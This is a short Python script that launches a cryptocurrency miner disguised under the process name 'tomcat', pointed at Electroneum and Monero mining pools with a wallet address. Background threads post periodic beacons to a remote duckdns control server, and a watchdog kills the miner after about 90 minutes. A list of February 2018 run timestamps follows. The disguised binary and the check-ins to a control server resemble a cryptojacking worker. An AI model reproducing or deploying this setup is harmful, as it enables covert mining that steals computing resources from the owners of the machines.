import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:22:07.446998
#2018-02-17 16:09:01.951109
#2018-02-17 17:56:01.578069
#2018-02-17 19:43:05.577021
#2018-02-17 21:30:05.381729
#2018-02-17 23:14:06.409225
#2018-02-18 01:00:10.106508
#2018-02-18 02:48:01.414585
#2018-02-18 04:37:03.724493
#2018-02-18 06:27:07.490047
#2018-02-18 08:15:08.637148
#2018-02-18 10:03:07.227503
#2018-02-18 11:49:05.710196
#2018-02-18 13:34:01.267862
#2018-02-18 15:23:07.706091
#2018-02-18 17:14:03.956198
#2018-02-18 19:02:01.763422
#2018-02-18 20:49:03.634963
#2018-02-18 22:34:01.872030
#2018-02-19 00:22:06.703966
#2018-02-19 02:08:06.480680
#2018-02-19 03:55:03.023653
#2018-02-19 05:39:07.193374
#2018-02-19 07:27:05.265100
#2018-02-19 09:17:04.623922
#2018-02-19 11:06:06.854230
#2018-02-19 12:53:05.797656
#2018-02-19 14:40:08.390998
#2018-02-19 16:27:05.328205
#2018-02-19 18:14:08.914984
#2018-02-19 20:01:08.623218
#2018-02-19 21:51:05.882740
#2018-02-19 23:37:03.995334
#2018-02-20 01:24:07.446192
#2018-02-20 03:15:08.336427
#2018-02-20 05:03:06.457558
#2018-02-20 06:45:07.834416
#2018-02-20 08:31:06.860634
#2018-02-20 10:15:09.235743
#2018-02-20 11:59:04.588443
#2018-02-20 13:47:07.176935
#2018-02-20 15:30:07.444368
#2018-02-20 17:15:09.699525
#2018-02-20 19:04:01.284913
#2018-02-20 20:52:08.479907
#2018-02-20 22:36:08.455017
#2018-02-21 00:17:05.210880
#2018-02-21 02:03:05.680135
#2018-02-21 03:51:01.424173
#2018-02-21 05:37:05.893953
#2018-02-21 07:25:09.425169
#2018-02-21 09:10:04.378760
#2018-02-21 10:58:04.007614
#2018-02-21 12:46:06.944217
#2018-02-21 14:34:07.645186
#2018-02-21 16:20:08.776357
#2018-02-21 18:11:08.295346
#2018-02-21 19:57:05.564034
#2018-02-21 21:44:06.154732
#2018-02-21 23:43:04.924974
#2018-02-22 01:32:01.258643
#2018-02-22 03:19:03.712328
#2018-02-22 05:06:04.361895
#2018-02-22 06:49:04.246337
#2018-02-22 08:37:08.014109
#2018-02-22 10:26:04.784329
#2018-02-22 12:13:01.639454
#2018-02-22 13:58:06.558077
#2018-02-22 15:45:10.799636
#2018-02-22 17:34:02.123830
#2018-02-22 19:22:01.930996
#2018-02-22 21:14:06.375317
#2018-02-22 22:58:01.477068
#2018-02-23 00:44:12.519774
#2018-02-23 02:33:06.001412
#2018-02-23 04:21:06.227958
#2018-02-23 06:08:04.759381
#2018-02-23 07:55:08.991382
#2018-02-23 10:11:04.221129
#2018-02-23 12:04:05.060970
#2018-02-23 13:52:02.048454
#2018-02-23 15:43:07.177358
#2018-02-23 17:30:11.655551
#2018-02-23 19:17:05.106496
#2018-02-23 21:00:11.161135
#2018-02-23 22:46:07.428005
#2018-02-24 00:31:01.725710
#2018-02-24 02:22:02.136616
#2018-02-24 04:11:05.540249
#2018-02-24 05:59:03.612548
#2018-02-24 07:47:06.224134
#2018-02-24 09:31:05.106454
#2018-02-24 11:24:06.270940
#2018-02-24 13:13:05.913567
#2018-02-24 15:03:05.121924
#2018-02-24 16:53:01.504789
#2018-02-24 18:41:06.760411
#2018-02-24 20:32:06.275345
#2018-02-24 22:33:01.859667
#2018-02-25 01:41:06.695758
#2018-02-25 05:00:09.837392
#2018-02-25 09:45:01.392611